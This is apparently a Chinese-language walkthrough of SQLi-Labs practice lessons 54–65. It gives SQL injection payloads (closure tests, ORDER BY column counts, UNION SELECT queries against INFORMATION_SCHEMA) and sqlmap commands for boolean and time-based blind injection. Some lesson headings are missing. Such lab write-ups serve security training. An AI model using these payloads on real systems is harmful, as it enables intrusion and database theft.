sqlilab-Less-54-65-writeup

sqlilab-Less-54-65-writeup

Less-54 GET请求联合查询10步拿key 单引号

进行联合查询注入的时候需要注意，前期判断是否成功闭合，判断字段数，都是要确保后台数据库存在字段id的编号，这里测试可以写ID=1,2,3 写其他数字看不到效果，然后开始查表名等其他后续操作就可以写个不存在的id编号即可

判断闭合方式是否成功?id=1'--+

判断字段数?id=1' order by 3--+?id=1' order by 4--+

确认可以注入的字段?id=-1' union select 1,2,3 --+根据显示的结果是可以通过2和3查看

查表名​​​Login name:2Your Password:BROZHOX7ME

查字段名​​​ ---> 16进制42524f5a484f58374d45 在线转换：Login name:2Your Password:idsessidsecret_FDK5tryy

查询字段值​​​Login name:2Your Password:oNf3esAKnoNVUbViCYCbGPzv

Less-55 GET请求联合查询14步拿key 小括号

跟Less-54一样的payload，拼合方式由单引号改成了小括号

判断闭合方式是否成功?id=1)--+

​​union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

其他操作跟Less-54一样

Less-56 GET请求联合查询14步拿key 单引号 小括号

判断闭合方式是否成功?id=1')--+

​​GET请求联合查询14步拿key 双引号

判断闭合方式是否成功?id=1"--+

​​GET请求5步拿key 单引号

此关卡不能使用联合查询，因为用户输出的数组且被逆序了，所以使用报错注入效果显著

​​GET请求5步拿key

跟Less-58一样，拼合方式是整型，不加单引号

​​GET请求5步拿key

跟Less-58一样，拼合方式是双引号和小括号

​​GET请求5步拿key

跟Less-58一样，拼合方式是单引号和双小括号

​​GET请求5步拿key

跟Less-58一样，但是把显错取消， 所以这里只能布尔型盲注和时间延时盲注，拼合方式是单引号和一个小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

python sqlmap.py -u --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

Less-63 GET请求5步拿key

跟Less-58一样，但是把显错取消， 所以这里只能布尔型盲注和时间延时盲注，拼合方式是单引号

使用sqlmap进行布尔型盲注

python sqlmap.py -u --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-64 GET请求5步拿key

跟Less-58一样，但是把显错取消， 所以这里只能布尔型盲注和时间延时盲注，拼合方式是双小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-65 GET请求5步拿key

跟Less-58一样，但是把显错取消， 所以这里只能布尔型盲注和时间延时盲注，拼合方式是单引号和小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

迷茫的人生，需要不断努力，才能看清远方模糊的志向！

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。